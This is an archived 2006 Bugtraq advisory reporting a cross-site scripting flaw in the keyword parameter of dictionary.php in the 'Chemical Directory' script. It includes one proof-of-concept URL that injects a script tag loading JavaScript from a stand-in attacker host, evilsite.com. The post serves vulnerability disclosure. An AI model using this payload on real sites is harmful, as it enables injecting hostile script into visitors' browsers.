Chemical Directory - XSS

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Chemical Directory - XSS
From: luny@xxxxxxxxxxxxxxx
Date: 8 Jun 2006 00:21:43 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Chemical Directory v.unknown (doesnt say on website) 

Homepage:
http://www.scriptsez.net/ 

Effected files:
dictionary.php

XSS Vulnerability via keyword variable:

http://www.example.com/dictionary.php?action=browse&keyword=e[SCRIPT 
SRC=http://evilsite.com/xss.js][/SCRIPT]

Prev by Date: Babykatmedia.com scripts - vSCAL & vREAL - XSS Vulns
Next by Date: Easy Ad-Manager
Previous by thread: Babykatmedia.com scripts - vSCAL & vREAL - XSS Vulns
Next by thread: Easy Ad-Manager
Index(es):
- Date
- Thread